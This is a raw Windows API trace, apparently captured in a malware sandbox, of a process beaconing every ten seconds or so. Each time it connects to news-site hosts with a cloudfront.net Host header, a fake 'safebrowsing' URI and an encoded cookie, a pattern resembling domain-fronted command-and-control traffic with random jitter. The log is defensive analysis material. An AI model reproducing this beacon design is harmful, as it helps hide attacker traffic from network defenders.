[0208.815] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0208.815] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0xd, wMilliseconds=0x8a))
[0208.815] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383138) returned 1
[0208.815] CryptGenRandom (in: hProv=0x383138, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0208.815] CryptReleaseContext (hProv=0x383138, dwFlags=0x0) returned 1
[0208.815] Sleep (dwMilliseconds=0x32d8)
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0218.830] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0218.830] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0218.830] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] htonl (hostlong=0xa000000) returned 0xa
[0218.830] htonl (hostlong=0x22000000) returned 0x22
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] htonl (hostlong=0xa000000) returned 0xa
[0218.830] htonl (hostlong=0x47000000) returned 0x47
[0218.830] GetLastError () returned 0x0
[0218.830] SetLastError (dwErrCode=0x0)
[0218.830] htonl (hostlong=0xa000000) returned 0xa
[0218.830] htonl (hostlong=0x1f000000) returned 0x1f
[0218.830] GetLastError () returned 0x0
[0218.831] SetLastError (dwErrCode=0x0)
[0218.831] htonl (hostlong=0x7000000) returned 0x7
[0218.831] htonl (hostlong=0x0) returned 0x0
[0218.831] htonl (hostlong=0x8000000) returned 0x8
[0218.831] htonl (hostlong=0x2000000) returned 0x2
[0218.831] htonl (hostlong=0x8000000) returned 0x8
[0218.831] htonl (hostlong=0x6000000) returned 0x6
[0218.831] htonl (hostlong=0x6000000) returned 0x6
[0218.831] GetLastError () returned 0x0
[0218.831] SetLastError (dwErrCode=0x0)
[0218.831] htonl (hostlong=0x0) returned 0x0
[0218.831] GetLastError () returned 0x0
[0218.831] SetLastError (dwErrCode=0x0)
[0218.831] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0218.831] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0218.831] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0218.831] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0219.597] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0219.597] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0219.597] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0219.597] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x17, wMilliseconds=0x39c))
[0219.597] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0219.597] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0219.597] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x17, wMilliseconds=0x39c))
[0219.597] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383bd8) returned 1
[0219.598] CryptGenRandom (in: hProv=0x383bd8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0219.598] CryptReleaseContext (hProv=0x383bd8, dwFlags=0x0) returned 1
[0219.598] Sleep (dwMilliseconds=0x32c7)
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0229.610] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0229.610] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0229.610] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] htonl (hostlong=0xa000000) returned 0xa
[0229.610] htonl (hostlong=0x22000000) returned 0x22
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] htonl (hostlong=0xa000000) returned 0xa
[0229.610] htonl (hostlong=0x47000000) returned 0x47
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] htonl (hostlong=0xa000000) returned 0xa
[0229.610] htonl (hostlong=0x1f000000) returned 0x1f
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] htonl (hostlong=0x7000000) returned 0x7
[0229.610] htonl (hostlong=0x0) returned 0x0
[0229.610] htonl (hostlong=0x8000000) returned 0x8
[0229.610] htonl (hostlong=0x2000000) returned 0x2
[0229.610] htonl (hostlong=0x8000000) returned 0x8
[0229.610] htonl (hostlong=0x6000000) returned 0x6
[0229.610] htonl (hostlong=0x6000000) returned 0x6
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] htonl (hostlong=0x0) returned 0x0
[0229.610] GetLastError () returned 0x0
[0229.610] SetLastError (dwErrCode=0x0)
[0229.610] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0229.610] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0229.610] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0229.611] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0230.286] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0230.286] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0230.286] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0230.286] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x22, wMilliseconds=0x265))
[0230.286] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0230.286] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0230.286] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x22, wMilliseconds=0x265))
[0230.286] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0230.287] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0230.287] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0230.287] Sleep (dwMilliseconds=0x342e)
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0240.292] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0240.292] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0240.292] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] htonl (hostlong=0xa000000) returned 0xa
[0240.292] htonl (hostlong=0x22000000) returned 0x22
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] htonl (hostlong=0xa000000) returned 0xa
[0240.292] htonl (hostlong=0x47000000) returned 0x47
[0240.292] GetLastError () returned 0x0
[0240.292] SetLastError (dwErrCode=0x0)
[0240.292] htonl (hostlong=0xa000000) returned 0xa
[0240.292] htonl (hostlong=0x1f000000) returned 0x1f
[0240.293] GetLastError () returned 0x0
[0240.293] SetLastError (dwErrCode=0x0)
[0240.293] htonl (hostlong=0x7000000) returned 0x7
[0240.293] htonl (hostlong=0x0) returned 0x0
[0240.293] htonl (hostlong=0x8000000) returned 0x8
[0240.293] htonl (hostlong=0x2000000) returned 0x2
[0240.293] htonl (hostlong=0x8000000) returned 0x8
[0240.293] htonl (hostlong=0x6000000) returned 0x6
[0240.293] htonl (hostlong=0x6000000) returned 0x6
[0240.293] GetLastError () returned 0x0
[0240.293] SetLastError (dwErrCode=0x0)
[0240.293] htonl (hostlong=0x0) returned 0x0
[0240.293] GetLastError () returned 0x0
[0240.293] SetLastError (dwErrCode=0x0)
[0240.293] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0240.293] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0240.293] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0240.293] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0240.972] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0240.972] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0240.972] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0240.972] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x2d, wMilliseconds=0x124))
[0240.972] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0240.972] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0240.972] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x2d, wMilliseconds=0x124))
[0240.972] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383df8) returned 1
[0240.972] CryptGenRandom (in: hProv=0x383df8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0240.972] CryptReleaseContext (hProv=0x383df8, dwFlags=0x0) returned 1
[0240.972] Sleep (dwMilliseconds=0x33f0)
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0250.987] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0250.987] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0250.987] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] htonl (hostlong=0xa000000) returned 0xa
[0250.987] htonl (hostlong=0x22000000) returned 0x22
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] htonl (hostlong=0xa000000) returned 0xa
[0250.987] htonl (hostlong=0x47000000) returned 0x47
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] htonl (hostlong=0xa000000) returned 0xa
[0250.987] htonl (hostlong=0x1f000000) returned 0x1f
[0250.987] GetLastError () returned 0x0
[0250.987] SetLastError (dwErrCode=0x0)
[0250.987] htonl (hostlong=0x7000000) returned 0x7
[0250.987] htonl (hostlong=0x0) returned 0x0
[0250.987] htonl (hostlong=0x8000000) returned 0x8
[0250.987] htonl (hostlong=0x2000000) returned 0x2
[0250.987] htonl (hostlong=0x8000000) returned 0x8
[0250.987] htonl (hostlong=0x6000000) returned 0x6
[0250.988] htonl (hostlong=0x6000000) returned 0x6
[0250.988] GetLastError () returned 0x0
[0250.988] SetLastError (dwErrCode=0x0)
[0250.988] htonl (hostlong=0x0) returned 0x0
[0250.988] GetLastError () returned 0x0
[0250.988] SetLastError (dwErrCode=0x0)
[0250.988] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0250.988] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0250.988] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0250.988] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0252.110] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0252.110] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0252.110] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0252.110] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x38, wMilliseconds=0x1b2))
[0252.110] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0252.110] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0252.110] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x38, wMilliseconds=0x1b2))
[0252.110] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3834f0) returned 1
[0252.110] CryptGenRandom (in: hProv=0x3834f0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0252.111] CryptReleaseContext (hProv=0x3834f0, dwFlags=0x0) returned 1
[0252.111] Sleep (dwMilliseconds=0x355a)
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0262.124] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0262.124] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0262.124] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] htonl (hostlong=0xa000000) returned 0xa
[0262.124] htonl (hostlong=0x22000000) returned 0x22
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] htonl (hostlong=0xa000000) returned 0xa
[0262.124] htonl (hostlong=0x47000000) returned 0x47
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] htonl (hostlong=0xa000000) returned 0xa
[0262.124] htonl (hostlong=0x1f000000) returned 0x1f
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] htonl (hostlong=0x7000000) returned 0x7
[0262.124] htonl (hostlong=0x0) returned 0x0
[0262.124] htonl (hostlong=0x8000000) returned 0x8
[0262.124] htonl (hostlong=0x2000000) returned 0x2
[0262.124] htonl (hostlong=0x8000000) returned 0x8
[0262.124] htonl (hostlong=0x6000000) returned 0x6
[0262.124] htonl (hostlong=0x6000000) returned 0x6
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] htonl (hostlong=0x0) returned 0x0
[0262.124] GetLastError () returned 0x0
[0262.124] SetLastError (dwErrCode=0x0)
[0262.124] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0262.124] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0262.124] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0262.124] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0262.967] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0262.967] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0262.967] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0262.967] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x7, wMilliseconds=0x126))
[0262.967] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0262.967] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0262.967] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x21, wSecond=0x7, wMilliseconds=0x126))
[0262.967] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0262.967] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0262.967] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0262.967] Sleep (dwMilliseconds=0x301f)
[0272.978] GetLastError () returned 0x0
[0272.978] SetLastError (dwErrCode=0x0)
[0272.978] GetLastError () returned 0x0
[0272.978] SetLastError (dwErrCode=0x0)
[0272.978] GetLastError () returned 0x0
[0272.978] SetLastError (dwErrCode=0x0)
[0272.978] GetLastError () returned 0x0
[0272.978] SetLastError (dwErrCode=0x0)
[0272.978] GetLastError () returned 0x0
[0272.978] SetLastError (dwErrCode=0x0)
[0272.978] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
